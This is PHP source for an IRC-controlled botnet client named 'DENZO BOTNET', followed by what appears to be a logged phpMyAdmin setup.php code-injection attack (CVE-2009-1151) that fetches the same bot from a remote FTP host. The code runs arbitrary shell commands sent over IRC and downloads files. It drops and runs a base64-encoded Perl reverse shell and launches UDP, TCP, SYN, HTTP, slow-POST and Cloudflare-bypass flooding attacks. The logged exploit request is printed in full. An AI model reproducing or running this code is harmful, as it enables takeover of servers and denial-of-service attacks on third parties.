$eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
break;
case "sexec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = shell_exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "passthru":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = passthru($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "popen":
if(isset($mcmd[1]))
{
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$this->privmsg($this->config['chan'],"[\2popen\2]: $command");
$pipe = popen($command,"r");
while(!feof($pipe))
{
$pbuf = trim(fgets($pipe,512));
if($pbuf != NULL)
$this->privmsg($this->config['chan']," : $pbuf");
}
pclose($pipe);
}
case "system":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = system($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "pscan": // -pscan 127.0.0.1 6667
if(count($mcmd) > 2)
{
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
else
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
}
break;
case "download":
if(count($mcmd) > 2)
{
if(!$fp = fopen($mcmd[2],"w"))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada.");
}
else
{
if(!$get = file($mcmd[1]))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2");
}
else
{
for($i=0;$i<=count($get);$i++)
{
fwrite($fp,$get[$i]);
}
$this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2");
}
fclose($fp);
}
}
else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
break;
case "die":
$this->send("QUIT : $nick Closed connection");
fclose($this->conn);
exit;
case "logout":
$this->log_out($host);
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick Ndang Cewok Lek Wes Mari!!!!");
break;
case "jsbypassflood":
print_r($mcmd);
if (count($mcmd) > 2) {
$this->cloudflareflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5], $mcmd[6]);
} else {
$this->privmsg($this->config['chan'], "syntax: jsbypassflood host port time [method] [url] [postFields]");
}
break;
case "masshttpv2":
if(count($mcmd)>2)
{
$this->HTTP_Flood($mcmd[1],$mcmd[2],$mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "syntax: masshttpv2 host page length");
}
break;
case "massudpflood":
if(count($mcmd)>3)
{
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "syntax: massudpflood host packet time");
}
break;
case "syn":
if (count($mcmd) > 2) {
$this->syn($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: syn host port time [delaySeconds]");
}
break;
case "massudp":
if (count($mcmd) > 4) {
$this->udpfloodv2($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: massudp host port time packetsize");
}
break;
case "masshttp":
if (count($mcmd) > 2) {
$this->httpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5]);
} else {
$this->privmsg($this->config['chan'], "syntax: masshttp host port time [method] [url]");
}
break;
case "syn":
if (count($mcmd) > 2) {
$this->syn($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: syn host port time [delaySeconds]");
}
break;
case "rudy":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "l7":
if (count($mcmd) > 3) {
if ($mcmd[1] == "get") {
$this->attack_http("GET", $mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "post") {
$this->attack_post($mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "head") {
$this->attack_http("HEAD", $mcmd[2], $mcmd[3]);
}
}
break;
case "tcpflood":
if(count($mcmd)>5)
{
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
}
break;
}
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->start();
}
function send($msg)
{
fwrite($this->conn,"$msg\r\n");
}
function join($chan,$key=NULL)
{
$this->send("JOIN $chan $key");
}
function privmsg($to,$msg)
{
$this->send("PRIVMSG $to :$msg");
}
function notice($to,$msg)
{
$this->send("NOTICE $to :$msg");
}
function is_logged_in($host)
{
if(isset($this->users[$host]))
return 1;
else
return 0;
}
function log_in($host)
{
$this->users[$host] = true;
}
function log_out($host)
{
unset($this->users[$host]);
}
public function set_nick() {
$fp = fsockopen("freegeoip.app", 80, $dummy, $dummy, 30);
if(!$fp)
$this->nick = "[BR]";
else {
fclose($fp);
$ctx = stream_context_create(array(
'http' => array(
'timeout' => 30
)
));
$buf = file_get_contents("http://freegeoip.app/json/", 0, $ctx);
if(!strstr($buf, "country_code"))
$this->nick = "[BR]";
else {
$code = strstr($buf, "country_code");
$code = substr($code, 12);
$code = substr($code, 3, 2);
$this->nick = "[" . $code . "]";
}
}
$nicky=array("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z");
$this->nick1 = $nicky[rand(0,count($nicky) - 1)];
$this->nick2 = $nicky[rand(0,count($nicky) - 1)];
$this->nick3 = $nicky[rand(0,count($nicky) - 1)];
$this->nick4 = $nicky[rand(0,count($nicky) - 1)];
$this->nick5 = $nicky[rand(0,count($nicky) - 1)];
$this->nick6 = $nicky[rand(0,count($nicky) - 1)];
for($i=0;$i<$this->config['maxrand'];$i++)
$this->send("NICK " . $this->nick);
$this->send("NICK ".$this->nick.$this->nick1.$this->nick2.$this->nick3.$this->nick4.$this->nick5.$this->nick6."");
}
function udpflood($host,$packetsize,$time) {
$this->privmsg($this->config['chan'],"\2[\2DENZO BOTNET | * UDPFLOOD ATACAR EM CURSO SOBRE: $host !!!\2]\2");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time) {
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
fwrite($fp,$packet);
fclose($fp);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"\2[DENZO BOTNET | $env MB enviados / Media: $vel mbp/s launch\2]\2");
}
//////////// Rudy Flood Added by Hax Stroke
function doSlow($host, $time) {
$this->privmsg($this->config['chan'], "[\2Rudy Flood Started!\2]");
$timei = time();
$i = 0;
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
$out = "POST / HTTP/1.1\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
$out .= "Content-Length: " . rand(1, 1000) . "\r\n";
$out .= "X-a: " . rand(1, 10000) . "\r\n";
if (@fwrite($fs[$i], $out)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2Rudy Flood Finished!\2]");
}
function cloudflareflood($host, $port, $time, $method="GET", $url="/", $post=array()) {
$this->privmsg($this->config['chan'], "\2[\2DENZO BOTNET | JS-BYPASS ATTACKING $host:$port FOR $time WITH $method METHOD ON THE $url PATH !!!\2]\2");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n";
//Cloudflare Bypass
$res = curl($host, null, $user_agent, true);
//Cloudflare Bypass
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare detected!...\2]");
//Get the math calc
$math_calc = get_between($res, "a.value = ", ";");
if ($math_calc) {
$math_result = (int) eval("return ($math_calc);");
if (is_numeric($math_result)) {
$math_result += strlen($host); //Domain lenght
//Send the CloudFlare's form
$getData = "cdn-cgi/l/chk_jschl";
$getData .= "?jschl_vc=".get_between($res, 'name="jschl_vc" value="', '"');
$getData .= "&jschl_answer=".$math_result;
$res = curl($host.$getData, null, $user_agent);
//Cloudflare Bypassed?
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare not bypassed...\2]");
return false;
} else {
$bypassed = true;
//Cookie read
$cookie = trim(get_between(file_get_contents("cookie.txt"), "__cfduid", "\n"));
$packet .= "Cookie: __cfduid=".$cookie."\r\n\r\n";
}
}
}
} else {
$this->privmsg($this->config['chan'], "[\2CloudFlare Detected !\2]");
}
if ($bypassed) {
$this->privmsg($this->config['chan'], "[\2CloudFlare bypassed!\2]");
}
$this->privmsg($this->config['chan'], "[\2JSBYPASS METHOD BY DENZELHAX ATTACKING !\2]");
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "\2[\2DENZO BOTNET | JSBYPASS STOPPING ON $host !!!\2]\2");
}
////////////
//////////// UDP FLOOD VERSION 2.0 ADDED BY HAX STROKE
function udpfloodv2($host, $port, $time, $packetsize) {
$this->privmsg($this->config['chan'], "\2[\2DENZO BOTNET | * MASSUDP ATACAR EM CURSO SOBRE: $host:$port !!!\2]\2");
$packet = "";
for ($i = 0; $i < $packetsize; $i++) {
$packet .= chr(rand(1, 256));
}
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://" . $host, $port, $e, $s, 5);
while (true) {
fwrite($fp, $packet);
fflush($fp);
if ($i % 100 == 0) {
if($end < time())
break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'], "04Ataque Finalizado Com Sucesso!");
}
////////////
function attack_http($mthd, $server, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Started On : $server!\2]");
$request = "$mthd / HTTP/1.1\r\n";
$request .= "Host: $server\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Accept: *.*\r\n";
$timei = time();
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Finished!\2]");
}
function attack_post($server, $host, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Started On : $server!\2]");
$request = "POST /" . md5(rand()) . " HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Content-Length: 1000000000\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Accept: *.*\r\n";
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
}
}
fclose($sockfd);
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Finished!\2]");
}
/////////////
function HTTP_Flood( $host , $page , $length )
{
$this->privmsg($this->config['chan'],"\2[DENZO BOTNET | Killing $host on $page path with $length lenght - Disconnected...]\2");
if ( $page == '' )
{
$page = '/';
}
$max_time = time() + $length;
$packet .= 'GET ' . $page . ' HTTP/1.1' . "\r\n";
$packet .= 'Host: ' . $host . "\r\n";
$packet .= 'User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:2.0b7) Gecko/20100101 Firefox/4.0b7' . "\r\n";
$packet .= 'Keep-alive: 300' . "\r\n";
$packet .= 'Connection: keep-alive' . "\r\n\r\n";
@$fp = fsockopen( $host, 80, $errno, $errstr, 5 );
while( 1 )
{
if ( time() > $max_time )
{
break;
}
if( $fp )
{
fwrite( $fp , $packet );
fclose( $fp );
$packets++;
}
else
{
@$fp = fsockopen( $host, 80, $errno, $errstr, 5 );
}
}
if ( $packets == 0 )
{
$this->privmsg($this->config['chan'],"[\2STARTED!\2]");
$this->privmsg($this->config['chan'],'<br /><b>An error occurred! Could not send packets.</b><br />' . "\n");
}
else
{
$this->privmsg($this->config['chan'],"[\2STARTED!\2]");
$this->privmsg($this->config['chan'],$host) ;
$this->privmsg($this->config['chan'],$length) ;
$this->privmsg($this->config['chan'],'<b>Packets:</b> ' . round($packets) . ' ( ' . round($packets/$length) . ' packets/s ) <br />' . "\n");
}
return 0;
}
////////////
function syn($host, $port, $time, $delay=1) {
$this->privmsg($this->config['chan'], "[\2SYN Started!\2]");
$timei = time();
$socks = array();
while (time() - $timei < $time) {
$numsocks++;
$socks[$numsocks] = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!$socks[$numsocks]) continue;
@socket_set_nonblock($socks[$numsocks]);
for ($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
}
$this->privmsg($this->config['chan'], "[\2SYN Finished (".$numsocks." socks created)!\2]");
}
////////////
function httpflood($host, $port, $time, $method="GET", $url="/") {
$this->privmsg($this->config['chan'], "\2[DENZO BOTNET | Killing $host:$port for $time - Disconnected...]\2");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "\2[DENZO BOTNET | Finished ! - Connected...]\2");
}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg($this->config['chan'],"\2[DENZO BOTNET | Killing TCP Connection $host:$port - Disconnected...]\2");
$packet = "";
for($i=0;$i<$packetsize;$i++)
$packet .= chr(mt_rand(1,256));
for($i=0;$i<$packets;$i++)
{
if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
{
$this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.");
}
function conback($ip,$port)
{
$this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
$dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNr ? IEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0 ? XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4i ? Ow0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQg ? PSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHBy ? b3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZF ? UiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsN ? Cm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAi ? U25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIp ? Ow0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVu ? KFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERF ? UlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBl ?eGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";
if (is_writable("/tmp"))
{
if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
$fp=fopen("/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /tmp/dc.pl $ip $port &");
unlink("/tmp/dc.pl");
}
else
{
if (is_writable("/var/tmp"))
{
if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); }
$fp=fopen("/var/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /var/tmp/dc.pl $ip $port &");
unlink("/var/tmp/dc.pl");
}
if (is_writable("."))
{
if (file_exists("dc.pl")) { unlink("dc.pl"); }
$fp=fopen("dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl dc.pl $ip $port &");
unlink("dc.pl");
}
}
}
}
function curl($url, $post=array(), $user_agent="", $deleteCookies=false) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
if ($user_agent) {
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
}
if (!empty($post)) {
curl_setopt($ch,CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
}
if ($deleteCookies) {
file_put_contents("cookie.txt", "");
}
curl_setopt ($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt ($ch, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
//$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return $result;
}
function get_between($string,$start,$end) {
$string = " ".$string;
$ini = strpos($string, $start);
if($ini==0) return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
$bot = new pBot;
$bot->start();
?>
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
95.110.227.41
Dest. port: 80
Time: 05/10/2019 20:13:47
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS31034 Aruba S.p.A.
Location: Tuscany, Arezzo (zipcode 52100)
rDNS: host41-227-110-95.serverdedicati.aruba.it
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.
CVE
CVE-2009-1151
Author
Adrian "pagvac" Pastor
Plugin ID
oosheefee1baixeinief5nociu5shohh
POST /phpMyAdmin/scripts/setup.php HTTP/1.1
Content-Length: 234
cookie2: $Version="1"
Host: 6.145.23.134
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://6.145.23.134/phpMyAdmin/scripts/setup.php
cookie: phpMyAdmin=2e43e013731e676c3502e227ca71d7da
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=a74bbbb1ba8ffc7009b69e36bcfd6dd6&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A27%3A%22ftp%3A%2F%2F95%2E110%2E227%2E41%2Fbot%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: 91e62db93324cf2680b117e568cf6df0
Type: text/x-php
Size: 41796
URL: ftp://95.110.227.41/bot.php
<?php
set_time_limit(0);
error_reporting(0);
echo "ok!";
class pBot
{
public $user_agents = array(
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
"Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
"Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Linux; Android 5.0; SM-G900F Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17",
"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36",
"Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1",
"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Linux; Android 5.0; SM-G900F Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17",
"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.63 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36",
